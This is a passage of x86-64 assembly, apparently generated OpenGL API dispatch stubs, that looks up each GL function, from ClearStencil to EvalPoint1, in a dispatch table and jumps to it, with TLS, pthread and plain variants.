.type GL_PREFIX(ClearStencil), @function
GL_PREFIX(ClearStencil):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1656(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearStencil), .-GL_PREFIX(ClearStencil)
.p2align 4,,15
.globl GL_PREFIX(ClearDepth)
.type GL_PREFIX(ClearDepth), @function
GL_PREFIX(ClearDepth):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1664(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ClearDepth), .-GL_PREFIX(ClearDepth)
.p2align 4,,15
.globl GL_PREFIX(StencilMask)
.type GL_PREFIX(StencilMask), @function
GL_PREFIX(StencilMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1672(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(StencilMask), .-GL_PREFIX(StencilMask)
.p2align 4,,15
.globl GL_PREFIX(ColorMask)
.type GL_PREFIX(ColorMask), @function
GL_PREFIX(ColorMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1680(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 1680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ColorMask), .-GL_PREFIX(ColorMask)
.p2align 4,,15
.globl GL_PREFIX(DepthMask)
.type GL_PREFIX(DepthMask), @function
GL_PREFIX(DepthMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1688(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DepthMask), .-GL_PREFIX(DepthMask)
.p2align 4,,15
.globl GL_PREFIX(IndexMask)
.type GL_PREFIX(IndexMask), @function
GL_PREFIX(IndexMask):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1696(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IndexMask), .-GL_PREFIX(IndexMask)
.p2align 4,,15
.globl GL_PREFIX(Accum)
.type GL_PREFIX(Accum), @function
GL_PREFIX(Accum):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1704(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Accum), .-GL_PREFIX(Accum)
.p2align 4,,15
.globl GL_PREFIX(Disable)
.type GL_PREFIX(Disable), @function
GL_PREFIX(Disable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1712(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Disable), .-GL_PREFIX(Disable)
.p2align 4,,15
.globl GL_PREFIX(Enable)
.type GL_PREFIX(Enable), @function
GL_PREFIX(Enable):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1720(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Enable), .-GL_PREFIX(Enable)
.p2align 4,,15
.globl GL_PREFIX(Finish)
.type GL_PREFIX(Finish), @function
GL_PREFIX(Finish):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1728(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Finish), .-GL_PREFIX(Finish)
.p2align 4,,15
.globl GL_PREFIX(Flush)
.type GL_PREFIX(Flush), @function
GL_PREFIX(Flush):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1736(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Flush), .-GL_PREFIX(Flush)
.p2align 4,,15
.globl GL_PREFIX(PopAttrib)
.type GL_PREFIX(PopAttrib), @function
GL_PREFIX(PopAttrib):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
movq 1744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1744(%rax), %r11
jmp *%r11
1:
pushq %rbp
call _glapi_get_dispatch
popq %rbp
movq 1744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PopAttrib), .-GL_PREFIX(PopAttrib)
.p2align 4,,15
.globl GL_PREFIX(PushAttrib)
.type GL_PREFIX(PushAttrib), @function
GL_PREFIX(PushAttrib):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1752(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(PushAttrib), .-GL_PREFIX(PushAttrib)
.p2align 4,,15
.globl GL_PREFIX(Map1d)
.type GL_PREFIX(Map1d), @function
GL_PREFIX(Map1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1760(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map1d), .-GL_PREFIX(Map1d)
.p2align 4,,15
.globl GL_PREFIX(Map1f)
.type GL_PREFIX(Map1f), @function
GL_PREFIX(Map1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1768(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %rcx, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %rcx
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map1f), .-GL_PREFIX(Map1f)
.p2align 4,,15
.globl GL_PREFIX(Map2d)
.type GL_PREFIX(Map2d), @function
GL_PREFIX(Map2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _x86_64_get_dispatch@PLT
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1776(%rax), %r11
jmp *%r11
1:
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _glapi_get_dispatch
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map2d), .-GL_PREFIX(Map2d)
.p2align 4,,15
.globl GL_PREFIX(Map2f)
.type GL_PREFIX(Map2f), @function
GL_PREFIX(Map2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _x86_64_get_dispatch@PLT
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1784(%rax), %r11
jmp *%r11
1:
subq $88, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %rdx, 32(%rsp)
movq %xmm2, 40(%rsp)
movq %xmm3, 48(%rsp)
movq %rcx, 56(%rsp)
movq %r8, 64(%rsp)
movq %r9, 72(%rsp)
call _glapi_get_dispatch
movq 72(%rsp), %r9
movq 64(%rsp), %r8
movq 56(%rsp), %rcx
movq 48(%rsp), %xmm3
movq 40(%rsp), %xmm2
movq 32(%rsp), %rdx
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $88, %rsp
movq 1784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Map2f), .-GL_PREFIX(Map2f)
.p2align 4,,15
.globl GL_PREFIX(MapGrid1d)
.type GL_PREFIX(MapGrid1d), @function
GL_PREFIX(MapGrid1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1792(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid1d), .-GL_PREFIX(MapGrid1d)
.p2align 4,,15
.globl GL_PREFIX(MapGrid1f)
.type GL_PREFIX(MapGrid1f), @function
GL_PREFIX(MapGrid1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1800(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 1800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid1f), .-GL_PREFIX(MapGrid1f)
.p2align 4,,15
.globl GL_PREFIX(MapGrid2d)
.type GL_PREFIX(MapGrid2d), @function
GL_PREFIX(MapGrid2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1808(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid2d), .-GL_PREFIX(MapGrid2d)
.p2align 4,,15
.globl GL_PREFIX(MapGrid2f)
.type GL_PREFIX(MapGrid2f), @function
GL_PREFIX(MapGrid2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1816(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %rsi, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %rsi
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $56, %rsp
movq 1816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MapGrid2f), .-GL_PREFIX(MapGrid2f)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1d)
.type GL_PREFIX(EvalCoord1d), @function
GL_PREFIX(EvalCoord1d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1824(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1d), .-GL_PREFIX(EvalCoord1d)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1dv)
.type GL_PREFIX(EvalCoord1dv), @function
GL_PREFIX(EvalCoord1dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1832(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1dv), .-GL_PREFIX(EvalCoord1dv)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1f)
.type GL_PREFIX(EvalCoord1f), @function
GL_PREFIX(EvalCoord1f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $8, %rsp
movq %xmm0, (%rsp)
call _x86_64_get_dispatch@PLT
movq (%rsp), %xmm0
addq $8, %rsp
movq 1840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1840(%rax), %r11
jmp *%r11
1:
subq $8, %rsp
movq %xmm0, (%rsp)
call _glapi_get_dispatch
movq (%rsp), %xmm0
addq $8, %rsp
movq 1840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1f), .-GL_PREFIX(EvalCoord1f)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord1fv)
.type GL_PREFIX(EvalCoord1fv), @function
GL_PREFIX(EvalCoord1fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1848(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord1fv), .-GL_PREFIX(EvalCoord1fv)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2d)
.type GL_PREFIX(EvalCoord2d), @function
GL_PREFIX(EvalCoord2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1856(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2d), .-GL_PREFIX(EvalCoord2d)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2dv)
.type GL_PREFIX(EvalCoord2dv), @function
GL_PREFIX(EvalCoord2dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1864(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2dv), .-GL_PREFIX(EvalCoord2dv)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2f)
.type GL_PREFIX(EvalCoord2f), @function
GL_PREFIX(EvalCoord2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1872(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2f), .-GL_PREFIX(EvalCoord2f)
.p2align 4,,15
.globl GL_PREFIX(EvalCoord2fv)
.type GL_PREFIX(EvalCoord2fv), @function
GL_PREFIX(EvalCoord2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1880(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalCoord2fv), .-GL_PREFIX(EvalCoord2fv)
.p2align 4,,15
.globl GL_PREFIX(EvalMesh1)
.type GL_PREFIX(EvalMesh1), @function
GL_PREFIX(EvalMesh1):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1888(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 1888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EvalMesh1), .-GL_PREFIX(EvalMesh1)
.p2align 4,,15
.globl GL_PREFIX(EvalPoint1)
.type GL_PREFIX(EvalPoint1), @function
GL_PREFIX(EvalPoint1):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
